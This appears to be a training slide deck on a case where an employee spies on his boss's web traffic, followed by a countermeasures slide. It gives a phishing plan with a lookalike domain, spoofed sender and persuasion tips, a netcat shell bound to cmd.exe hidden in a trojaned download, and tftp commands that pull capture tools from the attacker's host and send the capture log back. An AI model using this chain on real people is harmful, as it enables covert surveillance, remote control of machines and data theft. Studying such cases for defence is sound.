Upload
kristin-butler
View
215
Download
0
Tags:
Embed Size (px)
Citation preview
The Boss established a new policy against surfing the web during work hours
Phoenix decides to examine the sites that the Boss is looking at by spying on him
Policy
The networked machines are connected via a switch◦ Private 192.168.1.0 network
Boss’ IP: 192.168.1.5 Phoenix’s IP: 192.168.1.6
Setup
Monitor traffic to and from the Boss’ machine
How “loud” should this approach be?◦ Loud/noisy means that could trigger alarms of
IDS/IPS systems Might be reasons to launch a noisy attack
Provide a distraction to another attack Sometimes it’s the only way to monitor traffic
Since a single host’s traffic is the target, ARP poisoning, MAC spoofing or MAC flooding will not be done
The Plan
“Loud” methods◦ Gratuitous ARP for individual hosts
ARP Poisoning◦ MAC spoofing◦ MAC flooding◦ SPAN
Port mirroring
Viewing Switched Network Traffic
Gratuitous ARP◦ Unsolicited ARP
Protocol allows for it, without checking for the ARP request (stateless!)
ARP reply sent out associating the target’s IP with the collector’s MAC address
Spoof the MAC of the gateway◦ Collector replies to ARP requests for the gateway’s MAC◦ Switch will see the router’s MAC address on both switch
ports will send outbound traffic to both ports MAC flooding
◦ Overwhelm the switch’s MAC table Causes the switch to “failover” into hub mode
MACOF (http://monkey.org/~dugsong/dsniff/)
Viewing Switched Network Traffic
Capture the traffic on the target host itself◦ Plant WinPCap and Trojan Horse on the host
The trick will be to install the software on the target host◦ Boss will not blindly install software
Have to convince him it’s something of value to him The plan consists of a chained series of
exploits
Quieter method
Copy a web site and host it on Phoenix’s server Bind Netcat to a legitimate executable file Send email to boss
◦ Download the free executable Netcat will also be downloaded and installed
Connect to boss’ machine using Netcat Use TFTP and download a WinDump program
onto boss’ machine Capture the boss’ network traffic Analyze captured traffic Rebuild a jpg image using a hex editor
The Plan
Phoenix locates a site and plans to get his boss to visit a copied version of the site◦ Lays the groundwork via some social engineering
Tells boss of a site “certificatepractice.com” which offers free CCNA practice exam as a promotional offer
◦ Uses a utility to download and mirror the site Wget (www.gnu.org/software/wget) Copy the site recursively to hard drive, with
appropriate level of hyperlinks of the 1st page Will also copy the practice test executable
Phoenix will bind his Trojan to this executable
Phishing Scam
Trojan wrapper program is used◦ YAB (Yet Another Binder)
Areyoufearless.com (no longer there, however can get via BitTorrent sites) Altavista.net Packetstormsecurity.org
Add Bind File option Allows Phoenix to bind nc.exe
Will execute nc (asynchronously is possible) Can add execution parameters when nc starts up
Np 50 –e cmd.exe –L Registry startup option available (default is no) Melt stub option
Will remove netcat after execution Icon can be added to make the install appear legitimate
Binding the Trojan
Overwrite the original ccna.exe file with the bound Trojan file in the phony site
Register a very similar domain name◦ “certification-practice.com”
Send an email to victim◦ Phoenix uses an anonymous e-mailer and spoofs
the email header to have the “From:” appear as the real site www.mail.com
Doesn’t require a “real” email address to register Victim would have to read the email message headers
in order to see the real source domain
Setting up the phishing site
Check for spelling and grammatical errors Offer something free or trial basis Appeal to greed
◦ Why victim is getting something for nothing Lower suspicion
Appeal to victim’s sense of self◦ Self-help tools, adding to success, etc
Brevity Text of the email contains the link to the site
◦ Appears as the URL of the real site, but the hyperlink is really the phony site
Present the email to the victim◦ Possibly prepare the victim for the email, adding to the
enticement
Angry IP Scanner◦ www.angryziber.com/ipscan/
Scan IP’s on the network for the IP with port 50 open and listening
Obtain the Vic’s IP address
nc to the victim’s machine on port 50 Verify the connection using ipconfig
◦ Will show the victim machine’s IP in the nc window
Connect to the victim machine
Use command line utility◦ nc does not allow for usage of a GUI (Windows) interface
Sysinternals has a TFTP server available◦ Free◦ No configuration required◦ Windows already has a TFTP client!
Windump is downloaded◦ www.winpcap.org/windump◦ Placed into the default TFTP server directory (TFPT-Root)
Phoenix sets up a TFTP server on his machine Using Netcat, Phoenix types
tftp –i 192.168.1.6 get windump.exe windump.exetftp [-i] host [put | get] source destination
-i switch use binary transfer
Install packet capture software
Options◦ -c count (packets)◦ -s snaplength (length of packets captured)◦ -w filename (of captured packets)
windump –c 500 –s 1500 –w capture.log
If the victim does not have winpcap installed, Phoenix must transfer and manually install winpcap on victim machine◦ Windump requires winpcap
Run Windump
Phoenix downloads winpcap Unzips it TFTP (to victim’s winpcap directory)
◦ Daemon_mgm.exe◦ NetMonInstaller.exe◦ Npf_mgm.exe◦ Rpcapd.exe◦ Uninstall exe
ExecuteNpf_mgm.exe –rDaemon_mgm.exe –rNetMonInstaller.exe i
Installing winpcap
Using Netcattftp –I put 192.168.1.6 capture.log
Use a packet analyzer to view the traffic◦ Wireshark
A review show sites visited by the victim◦ Includes a GET (HTTP) for a file called “gambling.jpg”
Follow TCP stream◦ Capture the output as raw data◦ Use a hex editor (WinHex), if required, to edit the raw data
Remove everything before the actual binary file (HTTP commands, etc)
Leaves just the actual binary of the image Jpg starts with ÿØÿà
Analyzing the capture log
Anonymous note left on the victim’s desk highlighting the activity
Internet usage policy relaxed the next day
Finale
Phishing◦ Training!◦ Spam filters / phishing filters
Trojan horse◦ Anti-virus software
Latest signatures◦ However
Organizations will alter the Trojan (for a price) so that it does not match a signature EliteC0ders (no longer offers this “service”)
◦ Software policy◦ Sniffing
Port security on switches Protects against ARP poisoning, MAC spoofing and MAC flooding
IPS PromiScan Host based IDS
Cisco Secure Agent Warns if new application is launching
Countermeasures